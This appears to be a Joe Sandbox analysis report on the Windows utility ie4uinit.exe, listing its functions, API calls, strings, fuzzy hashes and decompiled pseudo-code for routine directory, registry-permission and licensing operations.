Failed to open registry key. Result:%1!lx!, xrefs: 00007FF7319C1B1D
Failed to set security descriptor. Result:%1!lx!, xrefs: 00007FF7319C1AFC
D:PAI(A;CI;KA;;;SY)(A;CI;KA;;;BA)(A;CI;KR;;;RC)(A;CI;KR;;;S-1-15-3-4096), xrefs: 00007FF7319C1AA4

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: String$Free$AddressAllocBstrConvertLibraryLoadLocalOpenProc
String ID: D:PAI(A;CI;KA;;;SY)(A;CI;KA;;;BA)(A;CI;KR;;;RC)(A;CI;KR;;;S-1-15-3-4096)$Failed to open registry key. Result:%1!lx!$Failed to set security descriptor. Result:%1!lx!$SOFTWARE\Microsoft\Internet Explorer\TypedURLs$Userenv.dll
API String ID: 2276871141-1078209490
Opcode ID: 2be6c8fd271fbb26c15d44e8a2634a99914d618e7c5969574731e15f72ece236
Instruction ID: 31f094b219a67e4abc17dfda20d4cd5fc027dbadd35f942673ecc1d9a6f78c45
Opcode Fuzzy Hash: 2be6c8fd271fbb26c15d44e8a2634a99914d618e7c5969574731e15f72ece236
Instruction Fuzzy Hash: F8119615F1CA82B1FB14BB11E810275A360AF45788FC44135C98D477ADEEADE544EB70

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319CA2F4 Relevance: 16.6, APIs: 11, Instructions: 138
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32 ref: 00007FF7319CA339
GetLastError.KERNEL32 ref: 00007FF7319CA348
SHCreateDirectoryExW.SHELL32 ref: 00007FF7319CA363
CreateFileW.KERNEL32 ref: 00007FF7319CA39D
GetLastError.KERNEL32 ref: 00007FF7319CA3B0
ConvertStringSidToSidW.ADVAPI32 ref: 00007FF7319CA3ED
IsValidSid.ADVAPI32 ref: 00007FF7319CA41B
#99.IERTUTIL ref: 00007FF7319CA434
LocalFree.KERNEL32 ref: 00007FF7319CA447
#37.IERTUTIL ref: 00007FF7319CA48F
FindCloseChangeNotification.KERNEL32 ref: 00007FF7319CA4B6

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Create$ErrorFileLast$ChangeCloseConvertDirectoryFindFreeLocalNotificationStringValid
String ID:
API String ID: 2025823435-0
Opcode ID: 29ec17aea24583c94ef666305796be332b3d32db1cf230e3dd3bf04aaae41091
Instruction ID: 72daece6fe845497aff587a8daaf8c53b8ef9d43008f8927756969ce98faeb2c
Opcode Fuzzy Hash: 29ec17aea24583c94ef666305796be332b3d32db1cf230e3dd3bf04aaae41091
Instruction Fuzzy Hash: 7551B421F086C2A5F750AB61E95877DA7A0AB44BACF805234CE99437D8DFFCE544DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C57F0 Relevance: 16.6, APIs: 11, Instructions: 92
filewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7319C571C: SHGetFolderPathW.SHELL32 ref: 00007FF7319C5758
Part of subcall function 00007FF7319C571C: SHCreateDirectoryExW.SHELL32 ref: 00007FF7319C5793

CreateFileW.KERNEL32 ref: 00007FF7319C5862
GetLastError.KERNEL32 ref: 00007FF7319C5875
SetFilePointer.KERNEL32 ref: 00007FF7319C588E
WriteFile.KERNEL32 ref: 00007FF7319C58B5
memset.MSVCRT ref: 00007FF7319C58C6
SetEvent.KERNEL32 ref: 00007FF7319C58CE
GetMessageW.USER32 ref: 00007FF7319C58EB
CloseHandle.KERNEL32 ref: 00007FF7319C590A
WriteFile.KERNEL32 ref: 00007FF7319C592C
LocalFree.KERNEL32 ref: 00007FF7319C5937
GetLastError.KERNEL32 ref: 00007FF7319C593F

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: File$CreateErrorLastWrite$CloseDirectoryEventFolderFreeHandleLocalMessagePathPointermemset
String ID:
API String ID: 3115231533-0
Opcode ID: e73cae9eeb114b7df5a807fa29b48a1195ea4523afd7f170b2e2f38376eded09
Instruction ID: 4e31e736a9b961f4dee101f6192db6f119bd2ae03c6228e52de6438a25c7ccda
Opcode Fuzzy Hash: e73cae9eeb114b7df5a807fa29b48a1195ea4523afd7f170b2e2f38376eded09
Instruction Fuzzy Hash: E1418431F18681D6F720AF25E844669B360FB89BA8F944231DA9D43B9CCF7CD905DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319E363C Relevance: 10.6, APIs: 7, Instructions: 143
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStartupInfoW.KERNEL32 ref: 00007FF7319E3664
Sleep.KERNEL32 ref: 00007FF7319E369B
_amsg_exit.MSVCRT ref: 00007FF7319E36B9
_initterm.MSVCRT ref: 00007FF7319E3744
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF7319E3771
exit.KERNELBASE ref: 00007FF7319E3816
_cexit.MSVCRT ref: 00007FF7319E3825

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_cexit_inittermexit
String ID:
API String ID: 642454821-0
Opcode ID: e0f9a9c421881e73c0dc6e8755979716e234bf2bb5e58aae01d1bcf6a5ac225e
Instruction ID: 44a2ce1ef3d651591dcaffa435e7802d01738b783ad1403c4ec2af25ad1742fb
Opcode Fuzzy Hash: e0f9a9c421881e73c0dc6e8755979716e234bf2bb5e58aae01d1bcf6a5ac225e
Instruction Fuzzy Hash: 90616C35E0D6C2B6E720AB10E840239B7A0FF48B49FD49135D94D53698DFBDEA41A770

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319CB35C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 51
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7319C15A0: memset.MSVCRT ref: 00007FF7319C15E9
Part of subcall function 00007FF7319C15A0: VerSetConditionMask.KERNEL32 ref: 00007FF7319C1603
Part of subcall function 00007FF7319C15A0: VerSetConditionMask.KERNEL32 ref: 00007FF7319C1612
Part of subcall function 00007FF7319C15A0: VerSetConditionMask.KERNEL32 ref: 00007FF7319C1621
Part of subcall function 00007FF7319C15A0: VerifyVersionInfoW.KERNEL32 ref: 00007FF7319C1642

LoadLibraryW.KERNEL32 ref: 00007FF7319CB38D
GetProcAddress.KERNEL32 ref: 00007FF7319CB3AE
FreeLibrary.KERNEL32 ref: 00007FF7319CB3D0

Strings

Internet-Browser-License-LicensedPartnerID, xrefs: 00007FF7319CB3BE
slc.dll, xrefs: 00007FF7319CB386
SLGetWindowsInformationDWORD, xrefs: 00007FF7319CB3A4

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ConditionMask$Library$AddressFreeInfoLoadProcVerifyVersionmemset
String ID: Internet-Browser-License-LicensedPartnerID$SLGetWindowsInformationDWORD$slc.dll
API String ID: 179017354-4234991666
Opcode ID: 96fd8919412aa2595a2c1029274416c6d0176d867f4885e756c88c1cf7ebb0a2
Instruction ID: 41a1411c8ac6adb04f0ee84da2a764de7744665d6328ced84ddd94600242e73a
Opcode Fuzzy Hash: 96fd8919412aa2595a2c1029274416c6d0176d867f4885e756c88c1cf7ebb0a2
Instruction Fuzzy Hash: 6F118E21E4D682A6E704AF01E450279B3A0FB45BD8F844031DECD07699DFBDE985DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C571C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00007FF77FF7319C571C(void* __eax, long long __rbx, void* __rcx, void* __rdx, long long _a24) {
				signed int _v24;
				char _v552;
				long long _v568;
				signed int _t10;
				void* _t13;
				void* _t21;
				signed long long _t29;
				void* _t33;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t51;

				_a24 = __rbx;
				_t29 =  *0x319f4658; // 0x8be7dd1f02a
				_v24 = _t29 ^ _t45 - 0x00000250;
				_t33 = __rdx;
				_t43 = __rcx;
				_v568 =  &_v552;
				r9d = 0;
				r8d = 0; // executed
				__imp__SHGetFolderPathW(); // executed
				if (__eax < 0) goto 0x319c57c0;
				if (E00007FF77FF7319C1310(__rdx, __rdx, __rdx,  &_v552, _t51) < 0) goto 0x319c57c0;
				_t10 = E00007FF77FF7319C9348(_t21,  &_v552, __rdx, __rdx, __rdx, _t44, L"Microsoft\\Internet Explorer", _t51);
				if (_t10 < 0) goto 0x319c57c0;
				r8d = 0;
				__imp__SHCreateDirectoryExW(); // executed
				if (_t10 == 0) goto 0x319c57b5;
				if (_t10 == 0xb7) goto 0x319c57b5;
				_t13 =  <=  ? _t10 : _t10 & 0x0000ffff | 0x80070000;
				goto 0x319c57c0;
				return E00007FF77FF7319E38D0(E00007FF77FF7319C9348(_t21,  &_v552, _t33, _t33, _t33, _t44, _t43, _t51), _t10, _v24 ^ _t45 - 0x00000250);
			}

0x7ff7319c571c
0x7ff7319c5729
0x7ff7319c5733
0x7ff7319c573b
0x7ff7319c5743
0x7ff7319c5746
0x7ff7319c5752
0x7ff7319c5755
0x7ff7319c5758
0x7ff7319c5760
0x7ff7319c5776
0x7ff7319c5782
0x7ff7319c5789
0x7ff7319c578b
0x7ff7319c5793
0x7ff7319c579d
0x7ff7319c57a4
0x7ff7319c57b0
0x7ff7319c57b3
0x7ff7319c57e0

APIs

SHGetFolderPathW.SHELL32 ref: 00007FF7319C5758

Part of subcall function 00007FF7319C9348: wcsncmp.MSVCRT(?,?,?,?,00000000,00007FF7319DAC11), ref: 00007FF7319C9379

SHCreateDirectoryExW.SHELL32 ref: 00007FF7319C5793

Strings

Microsoft\Internet Explorer, xrefs: 00007FF7319C5778

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: CreateDirectoryFolderPathwcsncmp
String ID: Microsoft\Internet Explorer
API String ID: 3141627564-1876886251
Opcode ID: beaf11281d083635c08d568e7de318a548798a0b0680f5760d1ced29a3223f42
Instruction ID: d81e125d206e4c34c4149bede22ad3a007219ee108276172f4c25bcb9669dc42
Opcode Fuzzy Hash: beaf11281d083635c08d568e7de318a548798a0b0680f5760d1ced29a3223f42
Instruction Fuzzy Hash: 12119821F1C7C292FB146B21A8553BEA354AF84788FC45035DECD82A89DE7CE0409B60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319CAFF4 Relevance: 4.6, APIs: 3, Instructions: 50networkCOMMON

Download Yara Rule

APIs

#820.IERTUTIL ref: 00007FF7319CB033
SHCreateDirectoryExW.SHELL32 ref: 00007FF7319CB057
PathIsNetworkPathW.SHLWAPI ref: 00007FF7319CB074

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Path$#820CreateDirectoryNetwork
String ID:
API String ID: 801761627-0
Opcode ID: 92353b7b675f50cf25608c853ab1a54d7e44ce44ad219ba182cff8b4500ce04e
Instruction ID: 2500eb747aa3991597a229c90c1396c14c7982030f675eb65749a73555ed4ef7
Opcode Fuzzy Hash: 92353b7b675f50cf25608c853ab1a54d7e44ce44ad219ba182cff8b4500ce04e
Instruction Fuzzy Hash: 8A116A32E0C6C3A2E720AB25E854376B390BF84789FC14031D99DC7558DE7DE548D720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C5AD8 Relevance: 4.5, APIs: 3, Instructions: 26synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32 ref: 00007FF7319C5B01
WaitForSingleObject.KERNEL32(?,?,80004005,00007FF7319C317D), ref: 00007FF7319C5B0F
CloseHandle.KERNEL32(?,?,80004005,00007FF7319C317D), ref: 00007FF7319C5B18

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: CloseHandleMessageObjectPostSingleThreadWait
String ID:
API String ID: 2249046209-0
Opcode ID: d3377d5071d618d0c6ebe101ace8b8c6169bfbcac3d3ef0026bbf390d11df7c7
Instruction ID: 8d73f8d1018bb913fcce16b515d7cbd285b9dd6d7d179ef09dfdd8c9abc519bc
Opcode Fuzzy Hash: d3377d5071d618d0c6ebe101ace8b8c6169bfbcac3d3ef0026bbf390d11df7c7
Instruction Fuzzy Hash: C1E0ED10F1828383FF856B39A85163A6394AF40B18F986034CA4986694DFACC8829B70

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C5A5C Relevance: 3.0, APIs: 2, Instructions: 37windowthreadCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00007FF7319C59EE), ref: 00007FF7319C5AA6
PostThreadMessageW.USER32 ref: 00007FF7319C5AC1

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Message$FormatPostThread
String ID:
API String ID: 3288790767-0
Opcode ID: b4688424976053713e22a411ea5df759a78d31b989a7e0de54b0288b041de2f4
Instruction ID: c9ad357289b94f957f93d44dca257b3256f53072b791be9063f2f8668fa3b826
Opcode Fuzzy Hash: b4688424976053713e22a411ea5df759a78d31b989a7e0de54b0288b041de2f4
Instruction Fuzzy Hash: EE018B32B28B8196E7009F55E88894C73A9F718B94FA54038DBAC43710DF36D9A4CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319CB460 Relevance: 3.0, APIs: 2, Instructions: 20COMMON

Download Yara Rule

APIs

NetGetJoinInformation.NETAPI32 ref: 00007FF7319CB478
NetApiBufferFree.NETAPI32 ref: 00007FF7319CB495

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: BufferFreeInformationJoin
String ID:
API String ID: 3807213042-0
Opcode ID: 377603d7a30d25cc5db3636ac1baf9980b49de4382541923c520329c1d5c1068
Instruction ID: 1a3b49e1dc8487f59da17048944a63941dfe01bde1e5ff268c3732162c123dc0
Opcode Fuzzy Hash: 377603d7a30d25cc5db3636ac1baf9980b49de4382541923c520329c1d5c1068
Instruction Fuzzy Hash: 23E09272A2C28196DB549F61E0C14A9F3A0F784745F80603AF98B42518DF7CD088DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319CA4D8 Relevance: 1.5, APIs: 1, Instructions: 40
networkCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00007FF77FF7319CA4D8(void* __eax, void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, void* __r10, long long _a8, long long _a16, long long _a24, intOrPtr _a40, long long _a48) {
				long long _v24;
				void* __rdi;
				void* _t13;
				void* _t17;
				intOrPtr _t21;
				void* _t22;
				void* _t29;
				void* _t35;
				void* _t36;
				long long _t40;
				void* _t45;

				_t37 = __rsi;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t21 = r9d;
				sil = __edx;
				_t29 = __rcx;
				if (r8b != 0) goto 0x319ca54e; // executed
				__imp__PathIsNetworkPathW(); // executed
				if (__eax != 0) goto 0x319ca54e;
				_t40 = _a48;
				r8d = _t21;
				r9d = _a40;
				_v24 = _t40;
				_t13 = E00007FF77FF7319CA2F4(sil, __rcx, __rcx, _t36, __rsi, _t45); // executed
				if (_t13 != 0x80070005) goto 0x319ca550;
				if (E00007FF77FF7319CA170(_t17, _t21, _t22, _t29, _t29, _t35, _t36, _t37, _t45, __r10) < 0) goto 0x319ca550;
				r9d = _a40;
				r8d = _t21;
				_v24 = _t40;
				E00007FF77FF7319CA2F4(sil, _t29, _t29, _t36, _t37, _t45);
				goto 0x319ca550;
				return 0;
			}

0x7ff7319ca4d8
0x7ff7319ca4d8
0x7ff7319ca4dd
0x7ff7319ca4e2
0x7ff7319ca4ec
0x7ff7319ca4ef
0x7ff7319ca4f2
0x7ff7319ca4f8
0x7ff7319ca4fa
0x7ff7319ca502
0x7ff7319ca504
0x7ff7319ca509
0x7ff7319ca50c
0x7ff7319ca517
0x7ff7319ca51c
0x7ff7319ca526
0x7ff7319ca532
0x7ff7319ca534
0x7ff7319ca539
0x7ff7319ca53f
0x7ff7319ca547
0x7ff7319ca54c
0x7ff7319ca564

APIs

PathIsNetworkPathW.SHLWAPI(00007FF7319C25CC), ref: 00007FF7319CA4FA

Part of subcall function 00007FF7319CA2F4: CreateFileW.KERNEL32 ref: 00007FF7319CA339
Part of subcall function 00007FF7319CA2F4: GetLastError.KERNEL32 ref: 00007FF7319CA348
Part of subcall function 00007FF7319CA2F4: SHCreateDirectoryExW.SHELL32 ref: 00007FF7319CA363
Part of subcall function 00007FF7319CA2F4: CreateFileW.KERNEL32 ref: 00007FF7319CA39D
Part of subcall function 00007FF7319CA2F4: ConvertStringSidToSidW.ADVAPI32 ref: 00007FF7319CA3ED
Part of subcall function 00007FF7319CA2F4: #99.IERTUTIL ref: 00007FF7319CA434
Part of subcall function 00007FF7319CA2F4: LocalFree.KERNEL32 ref: 00007FF7319CA447
Part of subcall function 00007FF7319CA2F4: #37.IERTUTIL ref: 00007FF7319CA48F

Part of subcall function 00007FF7319CA170: GetCurrentProcess.KERNEL32 ref: 00007FF7319CA1BD
Part of subcall function 00007FF7319CA170: OpenProcessToken.ADVAPI32 ref: 00007FF7319CA1D0
Part of subcall function 00007FF7319CA170: GetNamedSecurityInfoW.ADVAPI32 ref: 00007FF7319CA21A
Part of subcall function 00007FF7319CA170: SetNamedSecurityInfoW.ADVAPI32 ref: 00007FF7319CA26A
Part of subcall function 00007FF7319CA170: LocalFree.KERNEL32 ref: 00007FF7319CA285
Part of subcall function 00007FF7319CA170: LocalFree.KERNEL32 ref: 00007FF7319CA297
Part of subcall function 00007FF7319CA170: CloseHandle.KERNEL32 ref: 00007FF7319CA2B2

Part of subcall function 00007FF7319CA2F4: GetLastError.KERNEL32 ref: 00007FF7319CA3B0
Part of subcall function 00007FF7319CA2F4: IsValidSid.ADVAPI32 ref: 00007FF7319CA41B
Part of subcall function 00007FF7319CA2F4: FindCloseChangeNotification.KERNEL32 ref: 00007FF7319CA4B6

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: CreateFreeLocal$CloseErrorFileInfoLastNamedPathProcessSecurity$ChangeConvertCurrentDirectoryFindHandleNetworkNotificationOpenStringTokenValid
String ID:
API String ID: 1513689263-0
Opcode ID: 09f2045385a0e3583011558b58eca50c5022f07222ff13d13e64d49c21ccf82d
Instruction ID: 2107f095d4725ad80b370dd19934badde364becfd151fcb254e78e2644523609
Opcode Fuzzy Hash: 09f2045385a0e3583011558b58eca50c5022f07222ff13d13e64d49c21ccf82d
Instruction Fuzzy Hash: 25018032B0C7D299D710AB16B80016AF7A0BB95B98F845031EECA43B59EF6DE440DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C6A5C Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

#650.IERTUTIL ref: 00007FF7319C6A86

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: #650
String ID:
API String ID: 936228084-0
Opcode ID: 53993b22677627600bfc5543cafd368161df345289ff6722ee59e39c5e253c44
Instruction ID: e68f5cde3454199dc1888650ca127d3b6e4fdcb42e78a1fd748969073cc49f3a
Opcode Fuzzy Hash: 53993b22677627600bfc5543cafd368161df345289ff6722ee59e39c5e253c44
Instruction Fuzzy Hash: B0E06DB3B1479197D7009F56E98415CB775FB88B94F98C039C74843324DB74E8A5CB14

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319CB5B0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

#701.IERTUTIL ref: 00007FF7319CB5C0

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: #701
String ID:
API String ID: 1014962704-0
Opcode ID: aca5b28c5a1ca9f900d642336be1ac2d87ac2f5fa9b5555ec06c406419f1dcff
Instruction ID: 254f5bff89af8def6274b9f43cfebc60ff517aa8a6a6d391292aba15909733bb
Opcode Fuzzy Hash: aca5b28c5a1ca9f900d642336be1ac2d87ac2f5fa9b5555ec06c406419f1dcff
Instruction Fuzzy Hash: 81E01A65F0F783B2F708A72ABC50326A7D16F8879AFC44034D54993258DFADE140A720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319CB564 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

#701.IERTUTIL ref: 00007FF7319CB574

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

